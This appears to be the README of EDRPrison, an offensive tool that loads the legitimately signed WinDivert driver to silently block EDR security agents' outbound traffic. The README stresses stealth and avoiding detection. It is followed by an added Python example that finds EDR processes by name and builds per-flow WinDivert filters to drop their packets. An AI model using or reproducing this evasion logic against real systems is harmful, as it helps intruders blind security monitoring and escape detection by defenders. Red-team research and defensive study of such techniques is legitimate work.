EDRPrison: Silencing EDRs with Legitimate WFP Drivers
EDRPrison
EDRPrison leverages a legitimate WFP callout driver, WinDivert, to silence EDR systems at the network level. Drawing inspiration from tools like Shutter, FireBlock, and EDRSilencer, this project focuses on network-based evasion techniques. Unlike its predecessors, EDRPrison installs and loads an external, legitimately signed WFP callout driver instead of relying solely on the built-in WFP API. It then blocks outbound traffic from EDR processes by dynamically adding runtime filters, without directly interacting with the EDR processes or their executables.
In summary, EDRPrison has the following key features and capabilities:
- Legitimate WFP Callout Driver: Utilizes a legitimate WFP callout driver to enhance capabilities while maintaining a benign profile.
- EDR Process Detection: Searches for running EDR processes based on predefined process names.
- Packet Identification: Identifies packets originating from EDR processes.
- Dynamic Filter Addition: Dynamically adds WFP filters based on the source process of the packets.
- Non-Intrusive Approach: Avoids opening handles to EDR processes or their executables, which improves stealth and reduces the risk of detection.
Please refer to the article for more technical details.
Components
Elevated privileges are required to run EDRPrison successfully. EDRPrison comprises the following three components:
- EDRPrison: The main program and its dependencies. Its first execution installs the WinDivert driver.
- WinDivert64.sys: This is the signed WFP callout driver.
- WinDivert.dll: A component of the WinDivert project.
Benefits And Improvements
EDRPrison offers several enhancements and improvements over its predecessors, making it a more robust and stealthy tool for network-based EDR evasion:
- Instead of adding static WFP filters to EDR process executables, EDRPrison dynamically adds runtime WFP filters based on the packets’ source process.
- Avoids obtaining a handle to EDR processes or EDR executables, reducing the risk of detection and interference with the EDR systems.
- By loading a legitimate WFP callout driver, EDRPrison extends its capabilities while maintaining a benign profile.
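The following is an added example, not EDRPrison's own code, illustrating the logic the feature list and the improvements above describe: detect EDR processes by image name only (no process handle), match flow events to those PIDs, and build per-flow WinDivert filter strings that a NETWORK-layer handle would use to drop the EDR's outbound packets. It assumes the FLOW-layer data WinDivert reports per flow (process ID, local/remote address and port, protocol, direction) and WinDivert's filter language; the process names, PIDs, addresses and flow events are constructed for the demo, and whether EDRPrison uses exactly this FLOW-to-NETWORK approach is an assumption.

```python
"""
Added example (not EDRPrison's own code): plan WinDivert filters for EDR flows.

Assumed pipeline: a WinDivert FLOW-layer handle reports each new flow with its
owning process ID; flows owned by EDR processes are turned into NETWORK-layer
filter strings.  A handle opened with WinDivertOpen(filter,
WINDIVERT_LAYER_NETWORK, 0, 0) that receives matching packets and never
re-injects them effectively drops them, so each string is one runtime filter.
"""
from __future__ import annotations

from dataclasses import dataclass
from ipaddress import ip_address
from typing import Iterable

# Hypothetical EDR image names; the real tool ships its own predefined list.
EDR_PROCESS_NAMES = {"edr_agent.exe", "edr_sensor.exe"}

PROTO_TCP, PROTO_UDP = 6, 17


def find_edr_pids(process_snapshot: Iterable[tuple[int, str]],
                  edr_names: set[str] = EDR_PROCESS_NAMES) -> set[int]:
    """Match PIDs by image name only, e.g. from a Toolhelp32 snapshot.
    No OpenProcess() on the EDR is needed: that is the non-intrusive property."""
    wanted = {n.lower() for n in edr_names}
    return {pid for pid, name in process_snapshot if name.lower() in wanted}


@dataclass(frozen=True)
class FlowEvent:
    """Mirrors what WinDivert's FLOW layer reports per flow (ProcessId,
    Local/RemoteAddr, Local/RemotePort, Protocol) plus the outbound bit."""
    process_id: int
    protocol: int
    local_addr: str
    local_port: int
    remote_addr: str
    remote_port: int
    outbound: bool


def filter_for_flow(flow: FlowEvent) -> str | None:
    """Return a WinDivert filter string matching exactly this flow's outbound
    packets, or None for flows we leave alone (inbound, non-TCP/UDP)."""
    if not flow.outbound:
        return None
    if flow.protocol == PROTO_TCP:
        l4 = "tcp"
    elif flow.protocol == PROTO_UDP:
        l4 = "udp"
    else:
        return None
    l3 = "ip" if ip_address(flow.local_addr).version == 4 else "ipv6"
    return (f"outbound and {l3} and {l4}"
            f" and {l3}.SrcAddr == {flow.local_addr}"
            f" and {l4}.SrcPort == {flow.local_port}"
            f" and {l3}.DstAddr == {flow.remote_addr}"
            f" and {l4}.DstPort == {flow.remote_port}")


def plan_filters(edr_pids: set[int], flows: Iterable[FlowEvent]) -> list[str]:
    """Flows owned by EDR PIDs -> de-duplicated filter list in arrival order.
    Filters are keyed on the packet's source process, never on the executable."""
    seen: dict[str, None] = {}
    for flow in flows:
        if flow.process_id not in edr_pids:
            continue
        f = filter_for_flow(flow)
        if f is not None:
            seen.setdefault(f, None)
    return list(seen)


# Constructed process snapshot and flow events for the demo.
SAMPLE_PROCESSES = [(4, "System"), (812, "svchost.exe"),
                    (1337, "EDR_Agent.exe"), (2044, "edr_sensor.exe"),
                    (3100, "chrome.exe")]

SAMPLE_FLOWS = [
    FlowEvent(1337, PROTO_TCP, "10.0.0.5", 51000, "203.0.113.10", 443, True),
    FlowEvent(3100, PROTO_TCP, "10.0.0.5", 51001, "198.51.100.7", 443, True),
    FlowEvent(2044, PROTO_UDP, "10.0.0.5", 60000, "203.0.113.53", 53, True),
    FlowEvent(1337, PROTO_TCP, "10.0.0.5", 445, "10.0.0.9", 50222, False),
    FlowEvent(1337, PROTO_TCP, "10.0.0.5", 51000, "203.0.113.10", 443, True),
]


def demo() -> list[str]:
    """Two filters: the EDR agent's TCP/443 flow and the sensor's UDP/53 flow;
    the browser flow, the inbound flow and the duplicate event are skipped."""
    return plan_filters(find_edr_pids(SAMPLE_PROCESSES), SAMPLE_FLOWS)


if __name__ == "__main__":
    for f in demo():
        print(f)
```

Each string is a per-flow filter, so a new EDR connection produces a new filter at runtime rather than a static rule tied to the EDR's executable path; the trade-off is that the first packets of a flow may leave before the filter exists, which is a caveat for any FLOW-driven blocking design.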